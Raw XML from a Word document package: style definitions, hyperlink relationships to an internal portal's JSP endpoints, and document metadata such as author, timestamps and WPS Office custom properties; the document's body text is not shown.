        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
        <w:tab w:val="left" w:pos="1440"/>
      </w:tabs>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="title3">
    <w:name w:val="title3"/>
    <w:basedOn w:val="a1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a9">
    <w:name w:val="批注文字 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af4">
    <w:name w:val="批注主题 字符"/>
    <w:basedOn w:val="a9"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af9">
    <w:name w:val="二级标题"/>
    <w:basedOn w:val="2"/>
    <w:link w:val="afa"/>
    <w:qFormat/>
    <w:rPr>
      <w:b w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afb">
    <w:name w:val="正文（绿盟科技）"/>
    <w:link w:val="Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afa">
    <w:name w:val="二级标题 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="af9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:b w:val="0"/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="正文（绿盟科技） Char"/>
    <w:link w:val="afb"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="未处理的提及1"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="未处理的提及2"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="31">
    <w:name w:val="未处理的提及3"/>
    <w:basedOn w:val="a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41">
    <w:name w:val="未处理的提及4"/>
    <w:basedOn w:val="a1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ne-p">
    <w:name w:val="ne-p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ne-text">
    <w:name w:val="ne-text"/>
    <w:basedOn w:val="a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10.255.133.186:8888/portal/pages/frame/portal/home/homeAction.jsp?eaction=cityList" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.255.133.186:8888/portal/pages/frame/portal/home/homeAction.jsp?eaction=getKpiDataInfo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610</Words>
  <Characters>3481</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>29</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Chinese ORG</Company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wangyuanyuan</dc:creator>
  <cp:lastModifiedBy>2809772052@qq.com</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-25T07:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-25T08:30:00Z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5B77E7CEEC58BC6AFAE8886BEB80DBEB">
    <vt:lpwstr>otCYQxs9Dbw2bUEn/Soxv9pYAoWsCRIsU8+gIbxzzmNcJN13+qHIPyWmbF9hFzPHyi2m8DLwi54E5OVVM5pJ0yGmgAiYTaR6oYUdYZxdjep6I9xviFUFZ9aTScfBW9OGv7nqgAt4jhwsfQPiRowEMq47nH3BJfBWYb+Bjx9mf1M1AFPKM5xOCirhiv9UxWRW2kX42KqMTgFK8wTJSLImb9ktsaSYyTFW8I8lozHWRQpS8iPm3Esv2k9s2RDQ3Dm</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.8.2.11978</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>68D94ED641004F92B3C6B3DACA094018</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNDY2OTMyNGMyN2EzYzcxNDNmMDdlYzA4ZmI3ZmEyMmYiLCJ1c2VySWQiOiI0NjI0MjU3ODAifQ==</vt:lpwstr>
  </property>
</Properties>
</file>